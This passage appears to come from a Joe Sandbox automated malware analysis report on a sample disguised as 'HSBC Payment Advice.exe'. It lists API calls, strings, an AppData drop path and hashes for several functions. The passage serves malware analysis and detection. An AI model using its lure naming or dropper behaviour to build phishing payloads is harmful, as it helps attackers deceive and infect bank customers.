          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CallbackDispatcherUser
          • String ID:
          • API String ID: 2492992576-0
          • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
          • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
          • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
          • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

          Non-executed Functions

          Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
          Download Yara Rule
          APIs
          • GetDlgItem.USER32(?,000003F9), ref: 00404B26
          • GetDlgItem.USER32(?,00000408), ref: 00404B31
          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
          • LoadBitmapW.USER32(0000006E), ref: 00404B8E
          • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
          • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
          • DeleteObject.GDI32(00000000), ref: 00404C04
          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
          • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
          • ShowWindow.USER32(?,00000005), ref: 00404D5E
          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
          • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
          • GlobalFree.KERNEL32(?), ref: 00404F3E
          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
          • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
          • ShowWindow.USER32(?,00000000), ref: 004050DD
          • GetDlgItem.USER32(?,000003FE), ref: 004050E8
          • ShowWindow.USER32(00000000), ref: 004050EF
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
          • String ID: $M$N
          • API String ID: 1638840714-813528018
          • Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
          • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
          • Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
          • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
          Function 004045C8 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON
          Download Yara Rule
          APIs
          • GetDlgItem.USER32(?,000003FB), ref: 00404617
          • SetWindowTextW.USER32(00000000,?), ref: 00404641
          • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
          • CoTaskMemFree.OLE32(00000000), ref: 004046FD
          • lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
          • lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
            • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
            • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061DF
            • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
            • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061F3
            • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00406206
          • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
          • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
          • String ID: eremo$$: Completed$A$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion
          • API String ID: 2246997448-1504978202
          • Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
          • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
          • Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
          • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
          Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
          Download Yara Rule
          APIs
          • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 00405799
          • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 004057E1
          • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 00405804
          • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 0040580A
          • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 0040581A
          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
          • FindClose.KERNEL32(00000000), ref: 004058C9
          Strings
          • "C:\Users\user\Desktop\HSBC Payment Advice.exe", xrefs: 00405779
          • \*.*, xrefs: 004057DB
          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
          • String ID: "C:\Users\user\Desktop\HSBC Payment Advice.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
          • API String ID: 2035342205-876224079
          • Opcode ID: 2ba9f686f30b98943ed184ebf5661942f4c7cdb8ba3d698b6b7e4259e8a17ddf
          • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
          • Opcode Fuzzy Hash: 2ba9f686f30b98943ed184ebf5661942f4c7cdb8ba3d698b6b7e4259e8a17ddf
          • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
          Function 004042CA Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
          Download Yara Rule
          APIs
          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
          • GetDlgItem.USER32(?,000003E8), ref: 0040437C
          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
          • GetSysColor.USER32(?), ref: 004043AA
          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
          • lstrlenW.KERNEL32(?), ref: 004043CB
          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
          • GetDlgItem.USER32(?,0000040A), ref: 00404446
          • SendMessageW.USER32(00000000), ref: 0040444D
          • GetDlgItem.USER32(?,000003E8), ref: 00404478
          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
          • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
          • SetCursor.USER32(00000000), ref: 004044CC
          • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
          • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
          • SetCursor.USER32(00000000), ref: 004044F0
          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
          • String ID: : Completed$AB@$N$open
          • API String ID: 3615053054-1317861079
          • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
          • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
          • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
          • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
          Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON
          Download Yara Rule
          APIs
          • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C16
          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
          • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
            • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
            • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
          • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
          • wsprintfA.USER32 ref: 00405C7E
          • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
          • GlobalFree.KERNEL32(00000000), ref: 00405D6F
          • CloseHandle.KERNEL32(00000000), ref: 00405D76
            • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
            • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
          • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
          • API String ID: 1265525490-3322868524
          • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
          • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
          • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
          • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
          Download Yara Rule
          APIs
          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
          • BeginPaint.USER32(?,?), ref: 00401047
          • GetClientRect.USER32(?,?), ref: 0040105B
          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
          • DeleteObject.GDI32(?), ref: 004010ED
          • CreateFontIndirectW.GDI32(?), ref: 00401105
          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
          • SelectObject.GDI32(00000000,?), ref: 00401140
          • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
          • SelectObject.GDI32(00000000,00000000), ref: 00401160
          • DeleteObject.GDI32(?), ref: 00401165
          • EndPaint.USER32(?,?), ref: 0040116E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
          • String ID: F
          • API String ID: 941294808-1304234792
          • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
          • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
          • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
          • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
          Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
          Download Yara Rule
          APIs
          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061DF
          • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
          • CharNextW.USER32(?,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061F3
          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00406206
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Char$Next$Prev
          • String ID: "C:\Users\user\Desktop\HSBC Payment Advice.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
          • API String ID: 589700163-2863286114
          • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
          • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
          • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
          • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
          Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
          Download Yara Rule
          APIs
          • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
          • GetSysColor.USER32(00000000), ref: 004041CD
          • SetTextColor.GDI32(?,00000000), ref: 004041D9
          • SetBkMode.GDI32(?,?), ref: 004041E5
          • GetSysColor.USER32(?), ref: 004041F8
          • SetBkColor.GDI32(?,?), ref: 00404208
          • DeleteObject.GDI32(?), ref: 00404222
          • CreateBrushIndirect.GDI32(?), ref: 0040422C
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
